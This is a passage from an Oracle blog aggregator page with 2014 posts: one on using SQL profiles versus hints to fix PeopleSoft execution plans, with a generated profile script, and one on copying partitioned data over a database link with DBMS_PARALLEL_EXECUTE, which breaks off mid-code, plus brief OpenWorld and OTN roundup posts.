Skip navigation.

Feed aggregator

To Hint or not to hint (Application Engine), that is the question

David Kurtz - Mon, 2014-08-25 12:36
Over the years Oracle has provided a number of plan stability technologies to control how SQL statements are executed.  At the risk of over simplification, Outlines (deprecated in 11g), Profiles, Baselines and Patches work by injecting a set of hints into a SQL statement at parse time.  There is quite a lot of advice from Oracle to use these technologies to fix errant execution plans rather than hint the application.  I think it is generally good advice, however, there are times when this approach does not work well with PeopleSoft, and that is due to the behaviour and structure of PeopleSoft rather than the Oracle database.

It is possible to produce a SQL profile from a plan captured by AWR.  A part of distribution for the SQLT Diagnostic Tool (Doc ID 215187.1) is a script called coe_xfr_sql_profile.sql written by Carlos Sierra.
The only thing I would change in the delivered script, (for use with PeopleSoft and as suggested in a comment) is to create the profile with FORCE_MATCHING so that similar statements with different literal values still match. 
The Slings and Arrows of outrageous execution plans Let's take an example of a statement (from the vanilla Financials product that has not been customised) that performed poorly because it didn't generate a good execution plan (although I have cut out most of the statement for readability.  Note, that it references instance 5 of PeopleTools temporary record CA_SUM_TAO.
INSERT INTO PS_CA_SUM_RC_TAO5 (…) SELECT

FROM PS_CA_PR_SUMM A, PS_CA_SUM_TAO5 B , PS_CA_SUM_IN_USE C WHERE

B.PROCESS_INSTANCE = 51381955 AND C.IN_USE_FLAG = 'Y'

Plan hash value: 2039212279
----------------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
----------------------------------------------------------------------------------------------------
| 0 | INSERT STATEMENT | | | | 14424 (100)| |
| 1 | LOAD TABLE CONVENTIONAL | | | | | |
| 2 | NESTED LOOPS | | | | | |
| 3 | NESTED LOOPS | | 1 | 430 | 14424 (1)| 00:02:54 |
| 4 | NESTED LOOPS | | 1 | 318 | 14421 (1)| 00:02:54 |
| 5 | TABLE ACCESS FULL | PS_CA_SUM_IN_USE | 1 | 85 | 14420 (1)| 00:02:54 |
| 6 | TABLE ACCESS BY INDEX ROWID| PS_CA_SUM_TAO5 | 1 | 233 | 1 (0)| 00:00:01 |
| 7 | INDEX UNIQUE SCAN | PS_CA_SUM_TAO5 | 1 | | 0 (0)| |
| 8 | INDEX RANGE SCAN | PSACA_PR_SUMM | 1 | | 2 (0)| 00:00:01 |
| 9 | TABLE ACCESS BY INDEX ROWID | PS_CA_PR_SUMM | 1 | 112 | 3 (0)| 00:00:01 |
----------------------------------------------------------------------------------------------------
However, below is the plan we get on instance 4.  We get this plan because there is already a profile that has been applied in the past, but now we are on a different non-shared instance of the temporary table, so the profile cannot match because we are on different objects, and we get the same problem, but on different non-shared instances of the temporary record.  Different literal values, such as those for Process Instance can be handled by FORCE_MATCHING, but not different tables.  This is a totally different SQL statement.
SQL_ID 5gtxdqbx0d0c3
--------------------
INSERT INTO PS_CA_SUM_RC_TAO4 (…) SELECT

FROM PS_CA_PR_SUMM A, PS_CA_SUM_TAO4 B , PS_CA_SUM_IN_USE C WHERE

B.PROCESS_INSTANCE = 51377796 AND C.IN_USE_FLAG = 'Y'

Plan hash value: 3552771247

---------------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
---------------------------------------------------------------------------------------------------
| 0 | INSERT STATEMENT | | | | 36361 (100)| |
| 1 | LOAD TABLE CONVENTIONAL | | | | | |
| 2 | HASH JOIN | | 1 | 430 | 36361 (3)| 00:07:17 |
| 3 | TABLE ACCESS FULL | PS_CA_SUM_IN_USE | 1 | 85 | 14347 (1)| 00:02:53 |
| 4 | NESTED LOOPS | | | | | |
| 5 | NESTED LOOPS | | 1 | 345 | 22014 (3)| 00:04:25 |
| 6 | TABLE ACCESS FULL | PS_CA_PR_SUMM | 5268K| 562M| 21539 (1)| 00:04:19 |
| 7 | INDEX UNIQUE SCAN | PS_CA_SUM_TAO4 | 1 | | 0 (0)| |
| 8 | TABLE ACCESS BY INDEX ROWID| PS_CA_SUM_TAO4 | 1 | 233 | 1 (0)| 00:00:01 |
---------------------------------------------------------------------------------------------------

Note
-----
- SQL profile "coe_gn3n77gs6xj2a_3552771247" used for this statement
Of course, the statement on instance 4 had a profile because it was added as a short term fix and then left in situ long term.  It worked fine until a process errored, left the non-shared instance of the temporary record allocated to that process instance, and so PeopleSoft allocated instance 5 on the next execution.
So we could just create another profile using the coe_xfr_sql_profile.sql script
SPO coe_xfr_sql_profile_5gtxdqbx0d0c3_3552771247.log;
SET ECHO ON TERM ON LIN 2000 TRIMS ON NUMF 99999999999999999999;
REM
REM $Header: 215187.1 coe_xfr_sql_profile_5gtxdqbx0d0c3_3552771247.sql 11.4.1.4 2014/08/13 csierra $
REM
REM Copyright (c) 2000-2010, Oracle Corporation. All rights reserved.
REM
REM AUTHOR
REM carlos.sierra@oracle.com
REM
REM SCRIPT
REM coe_xfr_sql_profile_5gtxdqbx0d0c3_3552771247.sql
REM
REM DESCRIPTION
REM This script is generated by coe_xfr_sql_profile.sql
REM It contains the SQL*Plus commands to create a custom
REM SQL Profile for SQL_ID 5gtxdqbx0d0c3 based on plan hash
REM value 3552771247.
REM The custom SQL Profile to be created by this script
REM will affect plans for SQL commands with signature
REM matching the one for SQL Text below.
REM Review SQL Text and adjust accordingly.
REM
REM PARAMETERS
REM None.
REM
REM EXAMPLE
REM SQL> START coe_xfr_sql_profile_5gtxdqbx0d0c3_3552771247.sql;
REM
REM NOTES
REM 1. Should be run as SYSTEM or SYSDBA.
REM 2. User must have CREATE ANY SQL PROFILE privilege.
REM 3. SOURCE and TARGET systems can be the same or similar.
REM 4. To drop this custom SQL Profile after it has been created:
REM EXEC DBMS_SQLTUNE.DROP_SQL_PROFILE('coe_5gtxdqbx0d0c3_3552771247');
REM 5. Be aware that using DBMS_SQLTUNE requires a license
REM for the Oracle Tuning Pack.
REM
WHENEVER SQLERROR EXIT SQL.SQLCODE;
REM
VAR signature NUMBER;
REM
DECLARE
sql_txt CLOB;
h SYS.SQLPROF_ATTR;
BEGIN
sql_txt := q'[
INSERT INTO PS_CA_SUM_RC_TAO4 (PROCESS_INSTANCE, BUSINESS_UNIT, PROJECT_ID, ACTIVITY_ID, ANALYSIS_TYPE, RESOURCE_TYPE, RESOURCE_CATEGORY, RESOURCE_SUB_CAT, BI_DISTRIB_STATUS, GL_DISTRIB_STATUS, FOREIGN_CURRENCY, CONTRACT_CURRENCY, CONTRACT_NUM, CONTRACT_LINE_NUM, CA_FEE_STATUS, RESOURCE_QUANTITY, FOREIGN_AMOUNT_BSE, FOREIGN_AMOUNT_INC, FOREIGN_AMOUNT, CONTRACT_AMT_BSE, CONTRACT_AMT_INC, CONTRACT_AMT, MIN_TRANS_DT, MAX_TRANS_DT, CAND_MIN_TRANS_DT, CAND_MAX_TRANS_DT) SELECT B.PROCESS_INSTANCE, A.BUSINESS_UNIT, A.PROJECT_ID, A.ACTIVITY_ID, A.ANALYSIS_TYPE, A.RESOURCE_TYPE, A.RESOURCE_CATEGORY, A.RESOURCE_SUB_CAT, A.BI_DISTRIB_STATUS, A.GL_DISTRIB_STATUS,
A.FOREIGN_CURRENCY, A.CONTRACT_CURRENCY, A.CONTRACT_NUM, A.CONTRACT_LINE_NUM, A.CA_FEE_STATUS, (A.RESOURCE_QUANTITY+B.RESOURCE_QUANTITY), A.FOREIGN_AMOUNT, B.FOREIGN_AMOUNT, (A.FOREIGN_AMOUNT+B.FOREIGN_AMOUNT), A.CONTRACT_AMT, B.CONTRACT_AMT, (A.CONTRACT_AMT+B.CONTRACT_AMT), A.MIN_TRANS_DT, A.MAX_TRANS_DT, B.CAND_MIN_TRANS_DT, B.CAND_MAX_TRANS_DT FROM PS_CA_PR_SUMM A, PS_CA_SUM_TAO4 B , PS_CA_SUM_IN_USE C WHERE B.BUSINESS_UNIT = C.BUSINESS_UNIT AND B.PROJECT_ID = C.PROJECT_ID AND B.ACTIVITY_ID = C.ACTIVITY_ID AND B.ANALYSIS_TYPE = C.ANALYSIS_TYPE AND B.RESOURCE_TYPE = C.RESOURCE_TYPE AND B.RESOURCE_CATEGORY = C.RESOURCE_CATEGORY AND B.RESOURCE_SUB_CAT =
C.RESOURCE_SUB_CAT AND B.BI_DISTRIB_STATUS = C.BI_DISTRIB_STATUS AND B.GL_DISTRIB_STATUS = C.GL_DISTRIB_STATUS AND B.FOREIGN_CURRENCY = C.FOREIGN_CURRENCY AND B.CONTRACT_CURRENCY = C.CONTRACT_CURRENCY AND B.CONTRACT_NUM = C.CONTRACT_NUM AND B.CONTRACT_LINE_NUM = C.CONTRACT_LINE_NUM AND B.CA_FEE_STATUS = C.CA_FEE_STATUS AND A.BUSINESS_UNIT = B.BUSINESS_UNIT AND A.PROJECT_ID = B.PROJECT_ID AND A.ACTIVITY_ID = B.ACTIVITY_ID AND A.ANALYSIS_TYPE = B.ANALYSIS_TYPE AND A.RESOURCE_TYPE = B.RESOURCE_TYPE AND A.RESOURCE_CATEGORY = B.RESOURCE_CATEGORY AND A.RESOURCE_SUB_CAT = B.RESOURCE_SUB_CAT AND A.BI_DISTRIB_STATUS = B.BI_DISTRIB_STATUS AND A.GL_DISTRIB_STATUS =
B.GL_DISTRIB_STATUS AND A.FOREIGN_CURRENCY = B.FOREIGN_CURRENCY AND A.CONTRACT_CURRENCY = B.CONTRACT_CURRENCY AND A.CONTRACT_NUM = B.CONTRACT_NUM AND A.CONTRACT_LINE_NUM = B.CONTRACT_LINE_NUM AND A.CA_FEE_STATUS = B.CA_FEE_STATUS AND B.PROCESS_INSTANCE = 51377796 AND C.IN_USE_FLAG = 'Y'
]';
h := SYS.SQLPROF_ATTR(
q'[BEGIN_OUTLINE_DATA]',
q'[IGNORE_OPTIM_EMBEDDED_HINTS]',
q'[OPTIMIZER_FEATURES_ENABLE('11.2.0.3')]',
q'[DB_VERSION('11.2.0.3')]',
q'[OPT_PARAM('_unnest_subquery' 'false')]',
q'[OPT_PARAM('optimizer_dynamic_sampling' 4)]',
q'[OPT_PARAM('_optimizer_cost_based_transformation' 'off')]',
q'[ALL_ROWS]',
q'[OUTLINE_LEAF(@"SEL$1")]',
q'[OUTLINE_LEAF(@"INS$1")]',
q'[FULL(@"INS$1" "PS_CA_SUM_RC_TAO4"@"INS$1")]',
q'[FULL(@"SEL$1" "A"@"SEL$1")]',
q'[INDEX(@"SEL$1" "B"@"SEL$1" ("PS_CA_SUM_TAO4"."PROCESS_INSTANCE" "PS_CA_SUM_TAO4"."BUSINESS_UNIT" "PS_CA_SUM_TAO4"."PROJECT_ID" "PS_CA_SUM_TAO4"."ACTIVITY_ID" "PS_CA_SUM_TAO4"."ANALYSIS_TYPE" "PS_CA_SUM_TAO4"."RESOURCE_TYPE" "PS_CA_SUM_TAO4"."RESOURCE_CATEGORY" "PS_CA_SUM_TAO4"."RESOURCE_SUB_CAT" "PS_CA_SUM_TAO4"."BI_DISTRIB_STATUS" "PS_CA_SUM_TAO4"."GL_DISTRIB_STATUS" "PS_CA_SUM_TAO4"."FOREIGN_CURRENCY" "PS_CA_SUM_TAO4"."CONTRACT_CURRENCY" "PS_CA_SUM_TAO4"."CONTRACT_NUM" ]',
q'[ "PS_CA_SUM_TAO4"."CONTRACT_LINE_NUM" "PS_CA_SUM_TAO4"."CA_FEE_STATUS"))]',
q'[FULL(@"SEL$1" "C"@"SEL$1")]',
q'[LEADING(@"SEL$1" "A"@"SEL$1" "B"@"SEL$1" "C"@"SEL$1")]',
q'[USE_NL(@"SEL$1" "B"@"SEL$1")]',
q'[NLJ_BATCHING(@"SEL$1" "B"@"SEL$1")]',
q'[USE_HASH(@"SEL$1" "C"@"SEL$1")]',
q'[SWAP_JOIN_INPUTS(@"SEL$1" "C"@"SEL$1")]',
q'[END_OUTLINE_DATA]');
:signature := DBMS_SQLTUNE.SQLTEXT_TO_SIGNATURE(sql_txt);
DBMS_SQLTUNE.IMPORT_SQL_PROFILE (
sql_text => sql_txt,
profile => h,
name => 'coe_5gtxdqbx0d0c3_3552771247',
description => 'coe 5gtxdqbx0d0c3 3552771247 '||:signature||'',
category => 'DEFAULT',
validate => TRUE,
replace => TRUE,
force_match => TRUE /* TRUE:FORCE (match even when different literals in SQL). FALSE:EXACT (similar to CURSOR_SHARING) */ );
END;
/
WHENEVER SQLERROR CONTINUE
SET ECHO OFF;
PRINT signature
PRO
PRO ... manual custom SQL Profile has been created
PRO
SET TERM ON ECHO OFF LIN 80 TRIMS OFF NUMF "";
SPO OFF;
PRO
PRO COE_XFR_SQL_PROFILE_5gtxdqbx0d0c3_3552771247 completed
But then we must manually change the table and index names from 4 to 5.
DECLARE
sql_txt CLOB;
h SYS.SQLPROF_ATTR;
BEGIN
sql_txt := q'[
INSERT INTO PS_CA_SUM_RC_TAO5 (PROCESS_INSTANCE, BUSINESS_UNIT, PROJECT_ID, ACTIVITY_ID, ANALYSIS_TYPE, RESOURCE_TYPE, RESOURCE_CATEGORY, RESOURCE_SUB_CAT, BI_DISTRIB_STATUS, GL_DISTRIB_STATUS, FOREIGN_CURRENCY, CONTRACT_CURRENCY, CONTRACT_NUM, CONTRACT_LINE_NUM, CA_FEE_STATUS, RESOURCE_QUANTITY, FOREIGN_AMOUNT_BSE, FOREIGN_AMOUNT_INC, FOREIGN_AMOUNT, CONTRACT_AMT_BSE, CONTRACT_AMT_INC, CONTRACT_AMT, MIN_TRANS_DT, MAX_TRANS_DT, CAND_MIN_TRANS_DT, CAND_MAX_TRANS_DT) SELECT B.PROCESS_INSTANCE, A.BUSINESS_UNIT, A.PROJECT_ID, A.ACTIVITY_ID, A.ANALYSIS_TYPE, A.RESOURCE_TYPE, A.RESOURCE_CATEGORY, A.RESOURCE_SUB_CAT, A.BI_DISTRIB_STATUS, A.GL_DISTRIB_STATUS,
A.FOREIGN_CURRENCY, A.CONTRACT_CURRENCY, A.CONTRACT_NUM, A.CONTRACT_LINE_NUM, A.CA_FEE_STATUS, (A.RESOURCE_QUANTITY+B.RESOURCE_QUANTITY), A.FOREIGN_AMOUNT, B.FOREIGN_AMOUNT, (A.FOREIGN_AMOUNT+B.FOREIGN_AMOUNT), A.CONTRACT_AMT, B.CONTRACT_AMT, (A.CONTRACT_AMT+B.CONTRACT_AMT), A.MIN_TRANS_DT, A.MAX_TRANS_DT, B.CAND_MIN_TRANS_DT, B.CAND_MAX_TRANS_DT FROM PS_CA_PR_SUMM A, PS_CA_SUM_TAO5 B , PS_CA_SUM_IN_USE C WHERE B.BUSINESS_UNIT = C.BUSINESS_UNIT AND B.PROJECT_ID = C.PROJECT_ID AND B.ACTIVITY_ID = C.ACTIVITY_ID AND B.ANALYSIS_TYPE = C.ANALYSIS_TYPE AND B.RESOURCE_TYPE = C.RESOURCE_TYPE AND B.RESOURCE_CATEGORY = C.RESOURCE_CATEGORY AND B.RESOURCE_SUB_CAT =
C.RESOURCE_SUB_CAT AND B.BI_DISTRIB_STATUS = C.BI_DISTRIB_STATUS AND B.GL_DISTRIB_STATUS = C.GL_DISTRIB_STATUS AND B.FOREIGN_CURRENCY = C.FOREIGN_CURRENCY AND B.CONTRACT_CURRENCY = C.CONTRACT_CURRENCY AND B.CONTRACT_NUM = C.CONTRACT_NUM AND B.CONTRACT_LINE_NUM = C.CONTRACT_LINE_NUM AND B.CA_FEE_STATUS = C.CA_FEE_STATUS AND A.BUSINESS_UNIT = B.BUSINESS_UNIT AND A.PROJECT_ID = B.PROJECT_ID AND A.ACTIVITY_ID = B.ACTIVITY_ID AND A.ANALYSIS_TYPE = B.ANALYSIS_TYPE AND A.RESOURCE_TYPE = B.RESOURCE_TYPE AND A.RESOURCE_CATEGORY = B.RESOURCE_CATEGORY AND A.RESOURCE_SUB_CAT = B.RESOURCE_SUB_CAT AND A.BI_DISTRIB_STATUS = B.BI_DISTRIB_STATUS AND A.GL_DISTRIB_STATUS =
B.GL_DISTRIB_STATUS AND A.FOREIGN_CURRENCY = B.FOREIGN_CURRENCY AND A.CONTRACT_CURRENCY = B.CONTRACT_CURRENCY AND A.CONTRACT_NUM = B.CONTRACT_NUM AND A.CONTRACT_LINE_NUM = B.CONTRACT_LINE_NUM AND A.CA_FEE_STATUS = B.CA_FEE_STATUS AND B.PROCESS_INSTANCE = 51377796 AND C.IN_USE_FLAG = 'Y'
]';
h := SYS.SQLPROF_ATTR(
q'[BEGIN_OUTLINE_DATA]',
q'[IGNORE_OPTIM_EMBEDDED_HINTS]',
q'[OPTIMIZER_FEATURES_ENABLE('11.2.0.3')]',
q'[DB_VERSION('11.2.0.3')]',
q'[OPT_PARAM('_unnest_subquery' 'false')]',
q'[OPT_PARAM('optimizer_dynamic_sampling' 4)]',
q'[OPT_PARAM('_optimizer_cost_based_transformation' 'off')]',
q'[ALL_ROWS]',
q'[OUTLINE_LEAF(@"SEL$1")]',
q'[OUTLINE_LEAF(@"INS$1")]',
q'[FULL(@"INS$1" "PS_CA_SUM_RC_TAO5"@"INS$1")]',
q'[FULL(@"SEL$1" "A"@"SEL$1")]',
q'[INDEX(@"SEL$1" "B"@"SEL$1" ("PS_CA_SUM_TAO5"."PROCESS_INSTANCE" "PS_CA_SUM_TAO5"."BUSINESS_UNIT" "PS_CA_SUM_TAO5"."PROJECT_ID" "PS_CA_SUM_TAO5"."ACTIVITY_ID" "PS_CA_SUM_TAO5"."ANALYSIS_TYPE" "PS_CA_SUM_TAO5"."RESOURCE_TYPE" "PS_CA_SUM_TAO5"."RESOURCE_CATEGORY" "PS_CA_SUM_TAO5"."RESOURCE_SUB_CAT" "PS_CA_SUM_TAO5"."BI_DISTRIB_STATUS" "PS_CA_SUM_TAO5"."GL_DISTRIB_STATUS" "PS_CA_SUM_TAO5"."FOREIGN_CURRENCY" "PS_CA_SUM_TAO5"."CONTRACT_CURRENCY" "PS_CA_SUM_TAO5"."CONTRACT_NUM" ]',
q'[ "PS_CA_SUM_TAO5"."CONTRACT_LINE_NUM" "PS_CA_SUM_TAO5"."CA_FEE_STATUS"))]',
q'[FULL(@"SEL$1" "C"@"SEL$1")]',
q'[LEADING(@"SEL$1" "A"@"SEL$1" "B"@"SEL$1" "C"@"SEL$1")]',
q'[USE_NL(@"SEL$1" "B"@"SEL$1")]',
q'[NLJ_BATCHING(@"SEL$1" "B"@"SEL$1")]',
q'[USE_HASH(@"SEL$1" "C"@"SEL$1")]',
q'[SWAP_JOIN_INPUTS(@"SEL$1" "C"@"SEL$1")]',
q'[END_OUTLINE_DATA]');
:signature := DBMS_SQLTUNE.SQLTEXT_TO_SIGNATURE(sql_txt);
DBMS_SQLTUNE.IMPORT_SQL_PROFILE (
sql_text => sql_txt,
profile => h,
name => 'coe_5gtxdqbx0d0c3_3552771247',
description => 'coe 5gtxdqbx0d0c3 3552771247 '||:signature||'',
category => 'DEFAULT',
validate => TRUE,
replace => TRUE,
force_match => TRUE /* TRUE:FORCE (match even when different literals in SQL). FALSE:EXACT (similar to CURSOR_SHARING) */ );
END;
/
Or to take Arms against a Sea of statements, The profile has advantage that it can be applied quickly without a code change.  It is the perfect tool for the DBA with a production performance problem. However, there are some other considerations.
  • If applying to statement that references a PS temp record then we need to apply the profile to all instances of the record (both non-shared instances and the shared instance).
  • We were lucky that we referenced instance 5 of two temporary records. However, you could get a situation where a statement references different instances of different temporary records.  So perhaps instance 5 of one table and instance 6 of another.  In which case, you might also get instance 6 of the first table and instance 5 of the other.  A SQL profile could be needed for each permutation.
  • Bear in mind also that some areas of PeopleSoft use dynamically generated SQL.  So you get similar SQL statements which are sufficiently different for the profile not to match.  
  • Any changes to the expansion of Application Engine and PeopleCode MetaSQL on upgrading PeopleTools, or potentially even patching, will also prevent matching.
  • There is also the challenge of dealing with code changes as the system is upgraded, patched and customised.  A small code change, perhaps just an extra field in the select clause, can result in a performance regression because the profile stops matching. Of course, this challenge is not limited to PeopleSoft systems! 
Profiles are likely to be effective if there are no PeopleSoft temporary records present.  So you can generally use them in COBOL and SQR processes and the on-line application (other than in on-line Application Engine processes). Aye, there's the rub,I would use a profile (or a set of profiles) as a short-term temporary fix that is easier to introduce into production, and then add hints to the source code and so fix all instances of the code, not just the ones that have been profiled. Of course, that does entail a code change, and everything that goes with that.  One strong argument against making code change is that you have to change the code again to remove or change the hint if it becomes unnecessary at some time in future after a significant change, such as an Oracle upgrade.  However, on balance, I think it is better than the scenario where the profile stops working one day without warning.The rest is silence.Unless you add a comment.©David Kurtz, Go-Faster Consultancy Ltd.

★ How BIG is Oracle OpenWorld?

Eddie Awad - Sat, 2014-08-23 15:19

Oracle OpenWorld

Here is how big it was in 2013. Compare it to its size in 2012. It is safe to assume that it will be bigger in 2014!

I will attend this year’s event by invitation from the Oracle ACE Program. Prior to the start of the conference, I will be attending a two day product briefing with product teams at Oracle HQ. It’s like a mini OpenWorld but only for Oracle ACE Directors.

During the briefing, Oracle product managers talk about the latest and greatest product news. They also share super secret information that is not yet made public. I will report this information to you here on awads.net and via Twitter, unless of course it is protected by a non-disclosure agreement.

See you there!

Continue reading...

© Eddie Awad's Blog, 2014. | Permalink | Add a comment | Topic: Oracle | Tags:

Related articles:

Best of OTN - Week of August 17th

OTN TechBlog - Fri, 2014-08-22 11:43
Architect CommunityThe Top 3 most popular OTN ArchBeat video interviews of all time:
  1. Oracle Coherence Community on Java.net | Brian Oliver and Randy Stafford [October 24, 2013]
    Brian Oliver (Senior Principal Solutions Architect, Oracle Coherence) and Randy Stafford (Architect At-Large, Oracle Coherence Product Development) discuss the evolution of the Oracle Coherence Community on Java.net and how developers can actively participate in product development through Coherence Community open projects. Visit the Coherence Community at: https://java.net/projects/coherence.

  2. The Raspberry Pi Java Carputer and Other Wonders | Simon Ritter [February 13, 2014]
    Oracle lead Java evangelist Simon Ritter talks about his Raspberry Pi-based Java Carputer IoT project and other topics he presented at QCon London 2014.

  3. Hot Features in Oracle APEX 5.0 | Joel Kallman [May 14, 2014]
    Joel Kallman (Director, Software Development, Oracle) shares key points from his Great Lakes Oracle Conference 2014 session on new features in Oracle APEX 5.0.

Friday Funny from OTN Architect Community Manager Bob Rhubart:
Comedy legend Steve Martin entertains dogs in this 1976 clip from the Carol Burnette show.

Database Community

OTN Database Community Home Page - See all tech articles, downloads etc. related to Oracle Database for DBA's and Developers.

Java Community

JavaOne Blog - JRuby and JVM Languages at JavaOne!  In this video interview, Charles shared the JRuby features he presented at the JVM Language Summit. He'll be at JavaOne read the blog to see all the sessions.

Java Source Blog - IoT: Wearables! Wearables are a subset of the Internet of Things that has gained a lot of attention. Learn More.

I love Java FaceBook - Java Advanced Management Console demo - Watch as Jim Weaver, Java Technology Ambassador at Oracle, walks through a demonstration of the new Java Advanced Management Console (AMC) tool.

Systems Community

OTN Garage Blog - Why Wouldn't Root Be Able to Change a Zone's IP Address in Oracle Solaris 11? - Read and learn the answer.

OTN Garage FaceBook - Securing Your Cloud-Based Data Center with Oracle Solaris 11 - Overview of the security precautions a sysadmin needs to take to secure data in a cloud infrastructure, and how to implement them with the security features in Oracle Solaris 11.


Remote DML with DBMS_PARALLEL_EXECUTE

Dominic Brooks - Fri, 2014-08-22 10:20

An example of sucking data into a table over a db link using DBMS_PARALLEL_EXECUTE.

This particular example is based on something I needed to do in the real world, copying data from one database into another over a db link. Datapump is not available to me. Tables in question happen to be partitioned by a date-like number (boo!) hence some of the specific actions in the detail.

I think it’s a good example of how to use dbms_parallel_execute but also it might be interesting to see how we might combine that functionality with parallel sessions each operating on a single numeric partition.

For setup, let’s create a suitable source table on a remote db.
In this example, I’m recreating the entries in dba_objects for every day for a couple of years.

CREATE TABLE remote_px_test
(dt,owner,object_name,subobject_name,object_id,data_object_id,object_type,created,last_ddl_time,timestamp,status,temporary,generated,secondary,namespace,edition_name)
PARTITION BY RANGE(dt) INTERVAL(1)
(PARTITION p_default VALUES LESS THAN (20120101))
AS
WITH days AS
(SELECT TO_NUMBER(TO_CHAR(TO_DATE(20120101,'YYYYMMDD') + ROWNUM - 1,'YYYYMMDD')) dt
 FROM   dual
 CONNECT BY ROWNUM <= (TRUNC(SYSDATE) - TO_DATE(20120101,'YYYYMMDD')))
SELECT d.dt, o.*
FROM   dba_objects o
CROSS JOIN days d;
SELECT /*+ parallel(16) */ COUNT(*) FROM remote_px_test;
209957272

SELECT round(sum(bytes)/power(1024,3)) FROM user_segments WHERE segment_name = 'REMOTE_PX_TEST';
31

First step is to see how long it takes to do a parallel INSERT SELECT over a db link.

The benefits of parallelisation in such an operation is severely limited because we have a single session over the db link.

Back to the target database.

First create an empty destination table, same as remote.

CREATE TABLE remote_px_test
(dt,owner,object_name,subobject_name,object_id,data_object_id,object_type,created,last_ddl_time,timestamp,status,temporary,generated,secondary,namespace,edition_name)
PARTITION BY RANGE(dt) INTERVAL(1)
(PARTITION p_default VALUES LESS THAN (20100101))
AS
WITH days AS
(SELECT TO_NUMBER(TO_CHAR(TO_DATE(20120101,'YYYYMMDD') + ROWNUM - 1,'YYYYMMDD')) dt
 FROM   dual
 WHERE 1=0)
SELECT d.dt, o.*
FROM   dba_objects o
CROSS JOIN days d;

Now, let’s see how long it takes to do an INSERT SELECT over a db link.
Time is often not a good measure but in this case I’m primarily interested in how long it takes to copy a whole bunch of tables from A to B over a db link.

insert /*+ append */ into remote_px_test l
select * 
from   remote_px_test@d1 r;

209,957,272 rows inserted.

commit;

This executed in 20 minutes.

As mentioned, you could parallelise bits of it either side but the benefit is limited, it might even make things worse thanks to BUFFER SORT operation.

Next let’s compare to method with DBMS_PARALLEL_EXECUTE.

We want some parallel threads to work on independent partitions, doing direct path inserts, concurrently.

First I’m just going to create a view on the SOURCE DB to make my chunking on daily partition interval simpler.

I could create this on the TARGET DB with references to the dictionary tables over db link but it could be significantly slower depending on the number of partitioned tables and whether predicates are being pushed.

CREATE OR REPLACE VIEW vw_interval_partitions
AS
SELECT table_name, partition_name, partition_position, hi
FROM   (SELECT table_name, partition_name, partition_position
        ,      to_char(
                 extractvalue(
                   dbms_xmlgen.getxmltype
                  ('select high_value from user_tab_partitions x'
                 ||' where x.table_name   = '''||t.table_name||''''
                 ||' and   x.partition_name = '''|| t.partition_name|| ''''),'//text()')) hi
        FROM   user_tab_partitions t);

Secondly, I’m going to create a little helper package which will generate the dynamic SQL for our inserts into specific partitions (PARTITION FOR clause not able to use binds).

		
CREATE OR REPLACE PACKAGE sid_data_pkg
AS
  --
  PROCEDURE sid_ipt (
    i_table_name                 IN     VARCHAR2,
    i_table_owner                IN     VARCHAR2,
    i_column_name                IN     VARCHAR2,
    i_dblink                     IN     VARCHAR2,
    i_start_id                   IN     NUMBER,
    i_end_id                     IN     NUMBER
  );
  --
END sid_data_pkg;
/

CREATE OR REPLACE PACKAGE BODY sid_data_pkg
AS
  PROCEDURE sid_ipt (
    i_table_name                 IN     VARCHAR2,
    i_table_owner                IN     VARCHAR2,
    i_column_name                IN     VARCHAR2,
    i_dblink                     IN     VARCHAR2,
    i_start_id                   IN     NUMBER,
    i_end_id                     IN     NUMBER
  )
  AS
    --
    l_cmd CLOB;
    --
  BEGIN
     --
     l_cmd :=
     q'{INSERT /*+ APPEND */}'||chr(10)||
     q'{INTO   }'||i_table_name||chr(10)||
     q'{PARTITION FOR (}'||i_start_id||')'||chr(10)||
     q'{SELECT *}'||chr(10)||
     q'{FROM   }'||CASE WHEN i_table_owner IS NOT NULL THEN i_table_owner||'.' END
                 ||i_table_name
                 ||CASE WHEN i_dblink IS NOT NULL THEN '@'||i_dblink END
                 ||chr(10)||
     q'{WHERE  }'||i_column_name||' < '||i_end_id||chr(10)||
     CASE WHEN i_start_id IS NOT NULL THEN q'{AND   }'||i_column_name||' >= '||i_start_id END;
     --
     --DBMS_OUTPUT.PUT_LINE(l_cmd);
     --
     EXECUTE IMMEDIATE l_cmd;
     --
     COMMIT;
     --
  END sid_ipt;
  --
END sid_data_pkg;
/

Next, truncate our target table again.

Then create our parallel execute task:

begin
  DBMS_PARALLEL_EXECUTE.CREATE_TASK(task_name => 'PX_TEST_TASK');
end;
/

Create the chunks of work to be executed concurrently:

declare
 l_chunk_sql varchar2(1000);
begin
  l_chunk_sql := q'{select (hi - 1) AS partval, hi }'||chr(10)||
                 q'{from   vw_interval_partitions@d1 v }'||chr(10)||
                 q'{where  table_name = 'REMOTE_PX_TEST' }'||chr(10)||
                 q'{order  by partition_position }';
  DBMS_PARALLEL_EXECUTE.CREATE_CHUNKS_BY_SQL(task_name => 'PX_TEST_TASK',sql_stmt => l_chunk_sql, by_rowid => false);
end;
/

Check our task and our chunks:

select * from dba_parallel_execute_tasks;

TASK_OWNER TASK_NAME    CHUNK_TYPE   STATUS  TABLE_OWNER TABLE_NAME NUMBER_COLUMN TASK_COMMENT JOB_PREFIX SQL_STMT LANGUAGE_FLAG EDITION APPLY_CROSSEDITION_TRIGGER FIRE_APPLY_TRIGGER PARALLEL_LEVEL JOB_CLASS
---------- ------------ ------------ ------- ----------- ---------- ------------- ------------ ---------- -------- ------------- ------- -------------------------- ------------------ -------------- ---------
ME_DBA     PX_TEST_TASK NUMBER_RANGE CHUNKED 
select * from dba_parallel_execute_chunks order by chunk_id;

  CHUNK_ID TASK_OWNER TASK_NAME    STATUS     START_ROWID END_ROWID START_ID END_ID   JOB_NAME START_TS END_TS ERROR_CODE ERROR_MESSAGE
---------- ---------- ------------ ---------- ----------- --------- -------- -------- -------- -------- ------ ---------- -------------
      3053 ME_DBA     PX_TEST_TASK UNASSIGNED                       20120100 20120101 
      3054 ME_DBA     PX_TEST_TASK UNASSIGNED                       20120101 20120102 
        ...
      4017 ME_DBA     PX_TEST_TASK UNASSIGNED                       20140821 20140822 

 965 rows selected 

Then we run our parallel tasks thus, each executing the helper package and working on individual partitions:

set serveroutput on
DECLARE
  l_task     VARCHAR2(24) := 'PX_TEST_TASK';
  l_sql_stmt VARCHAR2(1000);
BEGIN
  --
